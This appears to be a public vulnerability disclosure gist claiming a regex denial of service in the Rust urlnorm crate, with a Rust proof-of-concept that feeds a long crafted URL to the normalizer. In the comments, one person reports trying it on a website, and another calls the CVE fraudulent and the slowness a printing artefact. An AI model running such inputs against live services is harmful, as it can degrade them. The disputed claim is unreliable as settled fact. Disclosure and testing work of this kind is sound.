Public disclosure of vulnerability inside the urlnorm crate through 0.1.4 for Rust

gistfile1.txt

Regex Denial of service in urlnorm package on https://crates.io/crates/urlnorm

The urlnorm crate through 0.1.4 for Rust allows Regular Expression Denial of Service (ReDos) via a crafted URL to lib.rs.

The regex defined on line 37. in https://github.com/progscrape/urlnorm/blob/main/src/lib.rs used for trimming .html and other 
extensions when normalizing the url is vulnerable to a Regex Denial of Service when malicious input is provided.
Poc Code:

'''
use url::Url;
use urlnorm::UrlNormalizer;
use std::{time::{Duration, Instant}};

fn main() {
    println!("[ + ] Testing urlnorm package");
    let x = std::iter::repeat("A5.html").take(50000).collect::<String>().to_owned();
    let norm = UrlNormalizer::default();

    let mut url_input ="https://goooooooogle.com/hello/index.html/".to_owned();
    url_input.push_str(x.as_str());
    url_input.push_str("\x00");

    let url = Url::parse(&url_input).unwrap();
    println!("{:?}",url);
    let start = Instant::now();
    let normalized = norm.compute_normalization_string(&url);
    //let normalized = norm.normalize_host(&url).unwrap();
    println!("[ + ] Url -> {:?}", normalized);
    let end = start.elapsed();
    println!("[ + ] Time elapsed {:?}", end);
}
'''

Is this vuln patched by dev ?
I tried on website I got "Error: PersistError(UnexpectedError("Storage fetch panicked"))"

This CVE is fraudulent. The purported repro testcase takes a reasonable amount of time to process when you don't print the output. Slow printing of URLs is not a CVE.